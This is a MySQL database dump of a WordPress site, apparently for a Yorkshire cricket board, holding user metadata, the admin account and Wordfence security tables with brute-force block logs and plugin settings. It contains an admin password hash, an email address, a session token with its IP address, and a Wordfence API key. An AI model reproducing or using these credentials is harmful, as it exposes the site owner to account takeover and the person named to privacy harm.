INSERT INTO `wp_usermeta` VALUES (1,1,'nickname','yorkshirecricketboard'),(2,1,'first_name',''),(3,1,'last_name',''),(4,1,'description',''),(5,1,'rich_editing','true'),(6,1,'comment_shortcuts','false'),(7,1,'admin_color','fresh'),(8,1,'use_ssl','0'),(9,1,'show_admin_bar_front','true'),(10,1,'wp_capabilities','a:1:{s:13:\"administrator\";b:1;}'),(11,1,'wp_user_level','10'),(12,1,'dismissed_wp_pointers',''),(13,1,'show_welcome_panel','1'),(14,1,'session_tokens','a:1:{s:64:\"0352f2936f68d9150a63b51f352b471a83befece95dc3d893aa95e56aaa53d28\";a:4:{s:10:\"expiration\";i:1649853428;s:2:\"ip\";s:14:\"185.175.113.72\";s:2:\"ua\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36\";s:5:\"login\";i:1649680628;}}'),(15,1,'wp_dashboard_quick_press_last_post_id','86'),(16,1,'wp_yoast_notifications','a:1:{i:0;a:2:{s:7:\"message\";s:179:\"Don\'t miss your crawl errors: <a href=\"https://yorkshirecricketboard.org.uk/wp-admin/admin.php?page=wpseo_search_console&tab=settings\">connect with Google Search Console here</a>.\";s:7:\"options\";a:8:{s:4:\"type\";s:7:\"warning\";s:2:\"id\";s:17:\"wpseo-dismiss-gsc\";s:5:\"nonce\";N;s:8:\"priority\";d:0.5;s:9:\"data_json\";a:0:{}s:13:\"dismissal_key\";N;s:12:\"capabilities\";s:14:\"manage_options\";s:16:\"capability_check\";s:3:\"all\";}}}'),(17,1,'last_login_time','2022-04-11 12:37:09'),(18,1,'wp_user-settings','editor=tinymce&hidetb=1&libraryContent=browse&imgsize=full&urlbutton=custom&advImgDetails=show'),(19,1,'wp_user-settings-time','1549963384'),(20,1,'_yoast_wpseo_profile_updated','1486486488'),(21,1,'wpseo_title',''),(22,1,'wpseo_metadesc',''),(23,1,'wpseo_metakey',''),(24,1,'wpseo_excludeauthorsitemap',''),(25,1,'wpseo_content_analysis_disable',''),(26,1,'wpseo_keyword_analysis_disable',''),(27,1,'googleplus',''),(28,1,'twitter',''),(29,1,'facebook',''),(30,1,'nav_menu_recently_edited','6'),(31,1,'managenav-menuscolumnshidden','a:5:{i:0;s:11:\"link-target\";i:1;s:11:\"css-classes\";i:2;s:3:\"xfn\";i:3;s:11:\"description\";i:4;s:15:\"title-attribute\";}'),(32,1,'metaboxhidden_nav-menus','a:4:{i:0;s:15:\"dw-menu-widgets\";i:1;s:12:\"add-post_tag\";i:2;s:15:\"add-post_format\";i:3;s:19:\"dw-megamenu-setting\";}'),(33,1,'syntax_highlighting','true'),(34,1,'locale','');
/*!40000 ALTER TABLE `wp_usermeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_users`
--

DROP TABLE IF EXISTS `wp_users`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_users` (
  `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_login` varchar(60) NOT NULL DEFAULT '',
  `user_pass` varchar(255) NOT NULL DEFAULT '',
  `user_nicename` varchar(50) NOT NULL DEFAULT '',
  `user_email` varchar(100) NOT NULL DEFAULT '',
  `user_url` varchar(100) NOT NULL DEFAULT '',
  `user_registered` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `user_activation_key` varchar(255) NOT NULL DEFAULT '',
  `user_status` int(11) NOT NULL DEFAULT 0,
  `display_name` varchar(250) NOT NULL DEFAULT '',
  PRIMARY KEY (`ID`),
  KEY `user_login_key` (`user_login`),
  KEY `user_nicename` (`user_nicename`),
  KEY `user_email` (`user_email`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_users`
--

LOCK TABLES `wp_users` WRITE;
/*!40000 ALTER TABLE `wp_users` DISABLE KEYS */;
INSERT INTO `wp_users` VALUES (1,'admin','$P$BUCeoNlVV3dJJTL7ZvJDJWUYewuWwb1','yorkshirecricketboard','zoe.allen@vanillacircus.co.uk','','2016-12-15 14:59:26','',0,'yorkshirecricketboard');
/*!40000 ALTER TABLE `wp_users` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfblockediplog`
--

DROP TABLE IF EXISTS `wp_wfblockediplog`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfblockediplog` (
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `countryCode` varchar(2) NOT NULL,
  `blockCount` int(10) unsigned NOT NULL DEFAULT 0,
  `unixday` int(10) unsigned NOT NULL,
  `blockType` varchar(50) NOT NULL DEFAULT 'generic',
  PRIMARY KEY (`IP`,`unixday`,`blockType`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfblockediplog`
--

LOCK TABLES `wp_wfblockediplog` WRITE;
/*!40000 ALTER TABLE `wp_wfblockediplog` DISABLE KEYS */;
INSERT INTO `wp_wfblockediplog` VALUES ('\0\0\0\0\0\0\0\0\0\0��}�Q','DE',2,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0����f','NO',5,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0����f','NO',1,18802,'brute'),('\0\0\0\0\0\0\0\0\0\0��\rCrc','SG',5,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0��\rCrc','SG',1,18802,'brute'),('\0\0\0\0\0\0\0\0\0\0��u�','US',1,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0��co�','HK',9,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0��co�','HK',4,18802,'brute'),('\0\0\0\0\0\0\0\0\0\0��\0','VN',6,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0��\0','VN',2,18802,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"�F','US',1,18802,'brute'),('\0\0\0\0\0\0\0\0\0\0��%:0�','DE',6,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0��%:0�','DE',2,18802,'brute'),('\0\0\0\0\0\0\0\0\0\0��%��','TR',4,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0��\'a�','CN',1,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0��\'a�','CN',1,18802,'brute'),('\0\0\0\0\0\0\0\0\0\0��\'jf','CN',2,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0��*Š','CN',3,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0��-7<n','US',1,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0��-7<n','US',2,18802,'brute'),('\0\0\0\0\0\0\0\0\0\0��-O#(','US',6,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0��-O#(','US',1,18802,'brute'),('\0\0\0\0\0\0\0\0\0\0��-��#','IR',8,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0��-��#','IR',2,18802,'brute'),('\0\0\0\0\0\0\0\0\0\0��.e�','GB',1,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0��/\\�','CN',3,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0��/\\�','CN',1,18802,'brute'),('\0\0\0\0\0\0\0\0\0\0��2ta3','US',3,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0��2ta3','US',1,18802,'brute'),('\0\0\0\0\0\0\0\0\0\0��3Q�','US',1,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0��3Q�','US',1,18802,'brute'),('\0\0\0\0\0\0\0\0\0\0��3�a','FR',1,18802,'brute'),('\0\0\0\0\0\0\0\0\0\0��4�5','US',1,18802,'brute'),('\0\0\0\0\0\0\0\0\0\0��6$�t','FR',2,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0��6$�t','FR',3,18802,'brute'),('\0\0\0\0\0\0\0\0\0\0��>m	y','RU',6,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0��>���','ES',4,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0��>���','ES',1,18802,'brute'),('\0\0\0\0\0\0\0\0\0\0��F#ŕ','US',5,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0��F#ŕ','US',2,18802,'brute'),('\0\0\0\0\0\0\0\0\0\0��H��f','US',1,18802,'brute'),('\0\0\0\0\0\0\0\0\0\0��MO�','PL',1,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0��N.��','DE',1,18870,'waf'),('\0\0\0\0\0\0\0\0\0\0��N/u�','DE',4,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0��N/u�','DE',1,18802,'brute'),('\0\0\0\0\0\0\0\0\0\0��UX�','NL',2,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0��UX�','NL',1,18802,'brute'),('\0\0\0\0\0\0\0\0\0\0��V?F','PL',6,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0��Xc�f','DE',7,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0��Xcڌ','DE',4,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0��Xcڌ','DE',2,18802,'brute'),('\0\0\0\0\0\0\0\0\0\0��[�[�','DE',1,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0��^2\'','FR',2,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0��_�E�','FI',3,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0��e\0{�','AU',1,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0��gbH','ID',1,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0��j��','CN',3,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0��o��','CN',2,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0��r��>','JP',2,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0��z�mm','AU',1,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0��|��+','HK',3,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0����N�','IR',3,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0����N�','IR',2,18802,'brute'),('\0\0\0\0\0\0\0\0\0\0���H�&','CL',1,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0���H�D','CL',2,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0���H�]','CL',1,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0���z�','US',4,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0����(','FI',1,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0����(','FI',2,18802,'brute'),('\0\0\0\0\0\0\0\0\0\0���ń�','CA',2,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0���ń�','CA',1,18802,'brute'),('\0\0\0\0\0\0\0\0\0\0����ɢ','DE',5,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0����ɢ','DE',2,18802,'brute'),('\0\0\0\0\0\0\0\0\0\0���;��','GB',3,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0���;��','GB',1,18802,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','CN',1,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','CN',1,18802,'brute'),('\0\0\0\0\0\0\0\0\0\0���n��','IN',1,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0���n��','IN',1,18802,'brute'),('\0\0\0\0\0\0\0\0\0\0���[m�','DE',3,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0���[m�','DE',2,18802,'brute'),('\0\0\0\0\0\0\0\0\0\0����`�','CA',2,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0���B�Y','SG',3,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0���H@a','US',5,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0���H@a','US',2,18802,'brute'),('\0\0\0\0\0\0\0\0\0\0���H�','SG',1,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0���8�T','CA',1,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0���8�T','CA',1,18802,'brute'),('\0\0\0\0\0\0\0\0\0\0���_l�','VN',6,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0����8t','SG',2,18821,'waf'),('\0\0\0\0\0\0\0\0\0\0����u�','US',5,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0���E4�','CA',6,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0���E4�','CA',2,18802,'brute'),('\0\0\0\0\0\0\0\0\0\0���YY�','US',3,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0���#p�','US',1,18802,'brute'),('\0\0\0\0\0\0\0\0\0\0���7��','DE',2,18827,'waf'),('\0\0\0\0\0\0\0\0\0\0���7��','DE',1,18837,'waf'),('\0\0\0\0\0\0\0\0\0\0���7��','DE',1,18838,'waf'),('\0\0\0\0\0\0\0\0\0\0����','US',3,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0���Dx1','DE',4,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0���Dx1','DE',3,18802,'brute'),('\0\0\0\0\0\0\0\0\0\0���Z�s','US',11,18871,'waf'),('\0\0\0\0\0\0\0\0\0\0���G�R','GB',5,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0���G�R','GB',2,18802,'brute'),('\0\0\0\0\0\0\0\0\0\0���G�','IN',1,18800,'brute'),('\0\0\0\0\0\0\0\0\0\0���G�','IN',1,18802,'brute'),('\0\0\0\0\0\0\0\0\0\0����2<','VN',3,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0����2<','VN',2,18802,'brute'),('\0\0\0\0\0\0\0\0\0\0���i�9','AU',3,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0���i�9','AU',3,18802,'brute'),('\0\0\0\0\0\0\0\0\0\0�����&','DE',2,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0�����&','DE',2,18802,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',22,18863,'waf'),('\0\0\0\0\0\0\0\0\0\0�����','US',22,18865,'waf'),('\0\0\0\0\0\0\0\0\0\0���0Z�','BD',4,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0���0Z�','BD',1,18802,'brute'),('\0\0\0\0\0\0\0\0\0\0���\\z�','CN',4,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0���\n','IT',1,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0���X�$','IR',4,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0���X�|','IR',2,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0���X�|','IR',2,18802,'brute'),('\0\0\0\0\0\0\0\0\0\0���b�','KZ',5,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0���b�','KZ',3,18802,'brute'),('\0\0\0\0\0\0\0\0\0\0�����0','IR',3,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0����9d','NL',5,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0����9d','NL',1,18802,'brute'),('\0\0\0\0\0\0\0\0\0\0����B','IR',3,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0�����;','GB',1,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0�����;','GB',1,18802,'brute'),('\0\0\0\0\0\0\0\0\0\0�����a','SG',24,18866,'waf'),('\0\0\0\0\0\0\0\0\0\0���FzC','FR',10,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0��’)d','KZ',3,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0���ɠ�','DE',3,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0���ɠ�','DE',1,18802,'brute'),('\0\0\0\0\0\0\0\0\0\0���ɧ�','DE',3,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0���ɧ�','DE',1,18802,'brute'),('\0\0\0\0\0\0\0\0\0\0���ɷC','DE',4,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0���ɷC','DE',1,18802,'brute'),('\0\0\0\0\0\0\0\0\0\0���c?','CA',4,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0���c?','CA',1,18802,'brute'),('\0\0\0\0\0\0\0\0\0\0��ɔk_','CL',3,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0���?�','NP',6,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0���?�','NP',1,18802,'brute'),('\0\0\0\0\0\0\0\0\0\0���A��','IN',7,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0��ν!�','SG',3,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0���&V�','US',5,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0���&V�','US',3,18802,'brute'),('\0\0\0\0\0\0\0\0\0\0���~A','US',2,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0��ё?p','US',1,18802,'brute'),('\0\0\0\0\0\0\0\0\0\0����}�','VN',3,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0����}�','VN',1,18802,'brute'),('\0\0\0\0\0\0\0\0\0\0����\'','IN',6,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0����\'','IN',2,18802,'brute'),('\0\0\0\0\0\0\0\0\0\0���y��','AU',7,18801,'brute'),('\0\0\0\0\0\0\0\0\0\0���y��','AU',3,18802,'brute'),('\0\0\0\0\0\0\0\0\0\0��ݏ0�','KR',2,18801,'brute');
/*!40000 ALTER TABLE `wp_wfblockediplog` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfblocks7`
--

DROP TABLE IF EXISTS `wp_wfblocks7`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfblocks7` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `type` int(10) unsigned NOT NULL DEFAULT 0,
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `blockedTime` bigint(20) NOT NULL,
  `reason` varchar(255) NOT NULL,
  `lastAttempt` int(10) unsigned DEFAULT 0,
  `blockedHits` int(10) unsigned DEFAULT 0,
  `expiration` bigint(20) unsigned NOT NULL DEFAULT 0,
  `parameters` text DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `type` (`type`),
  KEY `IP` (`IP`),
  KEY `expiration` (`expiration`)
) ENGINE=InnoDB AUTO_INCREMENT=400 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfblocks7`
--

LOCK TABLES `wp_wfblocks7` WRITE;
/*!40000 ALTER TABLE `wp_wfblocks7` DISABLE KEYS */;
INSERT INTO `wp_wfblocks7` VALUES (399,7,'\0\0\0\0\0\0\0\0\0\0��Q�L',1624610689,'Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'xuananh\'',1624610689,1,1624625089,NULL);
/*!40000 ALTER TABLE `wp_wfblocks7` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfconfig`
--

DROP TABLE IF EXISTS `wp_wfconfig`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfconfig` (
  `name` varchar(100) NOT NULL,
  `val` longblob DEFAULT NULL,
  `autoload` enum('no','yes') NOT NULL DEFAULT 'yes',
  PRIMARY KEY (`name`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfconfig`
--

LOCK TABLES `wp_wfconfig` WRITE;
/*!40000 ALTER TABLE `wp_wfconfig` DISABLE KEYS */;
INSERT INTO `wp_wfconfig` VALUES ('actUpdateInterval','2','yes'),('addCacheComment','0','yes'),('adminUserList','a:1:{i:1;i:1;}','yes'),('advancedCommentScanning','1','yes'),('ajaxWatcherDisabled_admin','0','yes'),('ajaxWatcherDisabled_front','0','yes'),('alertEmails','','yes'),('alertOn_adminLogin','1','yes'),('alertOn_block','1','yes'),('alertOn_breachLogin','1','yes'),('alertOn_firstAdminLoginOnly','0','yes'),('alertOn_firstNonAdminLoginOnly','0','yes'),('alertOn_loginLockout','1','yes'),('alertOn_lostPasswdForm','1','yes'),('alertOn_nonAdminLogin','0','yes'),('alertOn_scanIssues','1','yes'),('alertOn_severityLevel','25','yes'),('alertOn_throttle','0','yes'),('alertOn_update','0','yes'),('alertOn_wafDeactivated','1','yes'),('alertOn_wordfenceDeactivated','1','yes'),('alert_maxHourly','0','yes'),('allowed404s','/favicon.ico\n/apple-touch-icon*.png\n/*@2x.png\n/browserconfig.xml','yes'),('allowed404s6116Migration','1','yes'),('allowHTTPSCaching','0','yes'),('allowLegacy2FA','0','yes'),('allowMySQLi','1','yes'),('allScansScheduled','a:2:{i:0;a:2:{s:9:\"timestamp\";i:1624675200;s:4:\"args\";a:1:{i:0;i:1624675200;}}i:1;a:2:{s:9:\"timestamp\";i:1624934400;s:4:\"args\";a:1:{i:0;i:1624934400;}}}','yes'),('apiKey','1ca1dbed7f20a5c7055b6460346053801f42ec6a52f412415dd276c822dc77ba77ecc868344fe1023526e8c060b2ea8a0273191a1f4e09a9ec5f9c1c3a66737381f0767ae4d763be22163164431ab396','yes'),('autoBlockScanners','1','yes'),('autoUpdate','0','yes'),('autoUpdateAttempts','0','yes'),('bannedURLs','','yes'),('betaThreatDefenseFeed','0','yes'),('blockCustomText','','yes'),('blockedTime','300','yes'),('blocks702Migration','1','yes'),('cacheType','disabled','yes'),('cbl_action','block','yes'),('cbl_bypassRedirDest','','yes'),('cbl_bypassRedirURL','','yes'),('cbl_bypassViewURL','','yes'),('cbl_cookieVal','60d1c9207e253','yes'),('cbl_loggedInBlocked','','yes'),('cbl_redirURL','','yes'),('cbl_restOfSiteBlocked','1','yes'),('checkSpamIP','1','yes'),('config701Migration','1','yes'),('config720Migration','1','yes'),('coreHashes','�\0\0\0\0\0\0\0��a:2:{s:4:\"hash\";s:64:\"3c45ba27600b8a3c5584bf460ac68129a18a37f8de3346f8df888c26aa5a8d16\";s:6:\"hashes\";s:134752:\"\0���W7���ht#�	��q��)��d��$\0��\0(�띰xJ{�h�Ϯ�%��\r^��:��(�5��\0(����Z�Y�Y�@�Iq��ȗ#��T��@\04ߗ�t��\\v�Q�޹��\'_���ajx�Ҧ�\0E=j���ȋ|�p8.�½���֤��SGp�\0Eq�x����Pa���>bv�D��o4V�G;a<��\0^N��弘a�e|K��-��ܰ��ɜ=�\0b�&F�����%|w��*Qr;�|/�=(A���<�\0���#�B�5��j��$#��j!����bN��j�\0�ۧ��4(�K�I|���0��qD.^�v�\0�>|�;(߯\\W*�7?��\n�N��2=�7[Uo\0��i��ք�\"����]�^��XD��2](\0���/��o)��:4]��_���+̔�c���\0�e�*�@�t���\"��q	ȐN��5��H�\0�Z̈�~�0�=��G�#�C��Z}�*��p\0�T|̅_��S�8��O0μ�¸0����6�\0��-bs�G�\n(hr\Z.�n���!e��z.Yx��U�i��5G���$P�u�v�AT����p�l�J��}���a\Z�\0VX=:��8~\"2�ʦD�I�XV�f�EW��e���G�]���q)6��	�j��nNؤ^}0[P�KXs��+ȉa�w�S���[�U`|WS�PD�羟Nh��b!���#�8i�>kq6�R�E�5��:�\"��;B��i.qX��A4����uU��+ױ���ϱ��T�_^gy�zG�L\"1����U}6:��l|��(㜦��q{��V�~u�<�Dh�o*���cϬ0���x�cl$�	�4��m����o��`vA:����`{rf��_�S3/s��m�?d�^͔0�X0�#q��-ml�*��#T�c��x�E��ƒy�ũ��H���>��$�2��]�%��*�6�\\�dp�ۛ!��s%��]Z�Y�o�ݿ���������r;G�\"��Gu���&�w]�-H�\rRW��\\�5����\'��=�P�����sZF�ԤoD-x?�<�u���q�XQ�7ai�\rIC�pE�K����y��k�ѩ}ˣ�\\�$�p\"�&�p+^���\Z�{�����˜�5�|�f�㵅S�L�o3E�x���ѥU��q�`�q4u���Z����[n�8�O��r7��0H01YL$RRAhJ6��M�w:/�7�.�ڏP���h.B�U-ї�\'Ts��z+p���p8$�h��\"d�3���\\��pY�Q�ᣎ�K4�M�˻yUL���K��C�Wa��\\��ˁ�\n�;�0�Ġ\"f�АΟ��\'\r͍��D�dM������s�ǿ��ڴ�$2�j)�,\n�\' #6�9\n����ږ��mK�2�e�f�te�4���\Z�GG.�f��Vy`��)\".o[`�ϐ�\r�n���jn�viU\n@,�+!%u	re4�+JuP$,�WN��P�2�\"Ş�,|^��y޲���/\Z(A�1]�/ƅ�B�M�j:��@ѫ�G+S�f�����dV�i�\n�6W��ԑ\\<�O�Ej2�Q����\r�|�X6�����/46�J���?���X�GX�~��u���ic\r�p�����Q��활��\r?c�L�Tӊ���qg�ȫ?c�r�ȸ�t�d���B\rTJ�,Q��$�TDh���((Zd�z��vO����_��;ƀ��E�pY�.�&}��_�	�Q�������oS�nn�̵v�\0)�������Ӥ�:DILV�\0y�Z��)��K�\n��ܘD�~��%Ro��c��7�\r��L��>1�݈]�^]�RɢNF�M��J�,��i�I.2 ��>1�Z�;ר��1ԁ$�!��W:	�Sx�Dq5��/w��_W:��+f�1z��g���\\Y��m�x�GO0���jo].㖽�B�=�f~:N���Fa6�ա�\nY ���\'��i���+�`��fGYbm��UP��M��J�ڡ0�&Cv��M�$����O��4-K�	o6�lb�1E�;�7x�?�-�DZ��Z�zE���*�nk���E�m@������1s��Y�#1$��\Z�=I�����b��XBr�?���ͥ-�!�i�>�[��e�V{�W�!F�P�b<&„A����8�`��]wB�κ��@kp&���h4ԛ�2����f\'�G���IS��}�}R⥅�JЛZ[`�m��I�$=�����D��֛&�Ǿ@�+բ��z=�i���� S����\Z\Z4ڶ1�5���2�3\r#?E�Q���L��Im$�Z��B\Z�!��&�͖��Ck�`7���\'/��]�i��5�\0����%%��-��)^\\���\0�t`�k��@���U�OŔ�cp��>�!8HB6������=�b���!��n�z\0�OS~K��|$��T����lJ�b�Ow������f\nT����Eg\ZU�\r����l{��SYD7I�.`��Ï}#٧���JKN��e�ӌ��&��ЎuѡIq�t���n~T	_j��-����%��?�7�0i���}�e�iZ�O�&E+rX�e�{e��mX��<�:�KSz_oe���ŭy�^/?h;@r�K%��LP��f��c�(|�_]��U�͒o~ME��������s��Rp�d��F[��\'r�5l���蔝媀���s��@Z2]��i���](J~n�3��ϝ�ـ�hj��q�o�2��kL��JQ�c\0�8|V��A�����Nں�)\r�m�MA���D��os,����$���gJ	�Ŗ�7l}�a�������w|�gRLh!���1�R�&\'��k�D\':8YިK�Aa�-�RH�T���������(:�=ߤ\'\\�\0���|�8�(��]x�Z���vJ+�~�S�$ً6��vg�Aќ�ʋQ?�j�`J��N�]�0&��b�\0�V?9�����\"�.�I3�2r)rk�+`�NiM��2]<�	�h\n�˥���O��3�5F���\\�\0���,vS��+p\n�.����\r�J*RT	�!��A&��U�B�tG=_:\\�]>i��?η@ڹ�aKպ�*��Խ+]���ҮgƉ^62�G��\r�S��|�;)�$=X�n!����l=�@�A����:�V56U�x5�Px���&�:V�V��-qX��A9�M�4��-����t\n{���}�MI	AE0N������.T0b([���������oYd��%� �+�[�B��� f�<3)|���y-�d�����]`,5��l9�o���x��;����xZ���q@���51a�Ix���MOY�U�\r�Z�t�Kϭ�uJOyŹ�&Ҹ��*�ܲ�us#��t1��#4����䂹\Z��\'&�8�\0������m9;:��ͼ�f��f�)���I�;��Poi���=�DᎯ�0Sl�hsgܺ{�,��)\Z|����<�\n�x��*����i����`��h��`�P��*ͤ�!j1m!�~�J��\r�O�]��Y<�y�}�\Z�>ɺH���I|��P�����Bb��e�^��Έ;VT1��cj�] k^�O��9�A9�/�\Z�%�@b�.�`�� po��df��?�jr��Y��e|�H��h>�,�ec���R�es5-���D=��<��:3��ϩ�M���>���r�6�Ԥ��%z�uۇ7�}�F���[yx��]k��ݭ�Yr����9�IV,C2�\"���V�l��p�]l2�P�f>�Kp��֚J���bvw�`���*�w��}����*ʘ��)>2�q��e��^�)�P����n�GfR�@Ol,>iv�:�`�tQ�*�8\'�<��\n����J���;�H`�Q؝6pq���a�%��\r��	��\"�A�n�3H�Is�:Y��a�e0BҲy�Pp\nﭾ�����!Λ���&��Ʌ\'M��4�B�S���+\'�4&�$ء��Vgg��o��g~��m/�/&t+���s�����\"#:Z�ܯ4㓉&_&���6\"xF�|w`AZ_+vL\r}��N�P���6������_��Ұ�ݾ��l2�b���qÜ$U�v��	l,s���\"\r�m��`��Yד�U��X^�Ms���6R�H@�	&�冾�B�x��@d�R#U��O�Pg��sH�o�)n��Wr��t�Z�M���?%���V���D��Fv�@�����*9V���μ�[E��Bu}<�\Z#�d�4*�?���d�Q]Bx.|9D��:h@��Q��/U\0-|_ۢ1�g-�+����}�Ԙ!^iB���J��\\W�]�f��@@�w�=	.]��kZ1љm�G���]�x�0���	14\"1�Ix��GL�[	���>(G�A:���	64���� �2DM�M�$�\r澐i�\0���	8\\Ŭ�j�A��ʔ5�+X���o�T�m�_|	M��yu$�1�ck_�K�o�f��m���%�	g)[.�r\n�o�i�{4��Q\n\r8H�\rfX��	v�l���ٮ�!��P��m���\n6|ϔK	~�C�ȫ��7���:��s&u����j��t	�+�{R���ل���n�t,�Ǟ�`���|U�	�	��#t�̹��p=�I\"����)F	֓���-�\nqU��i���-�$�h*��m�l	�Vh���LC��»>U�8.�`�@<K��h	�Ϳ��U%�O�Hޡ�@�~x\\6��~�\n<�:�X�h�QAT����o��p2���8>�\n*��<��ӳ�?HM��\'V���L�\'[R�\n�@&��[DqS�������B��N#F�B��\n*An���.]�B��t�v�!�WҧMw�9�F\n+P_tQ�Vo����7n�\nz#�8�����J\nGk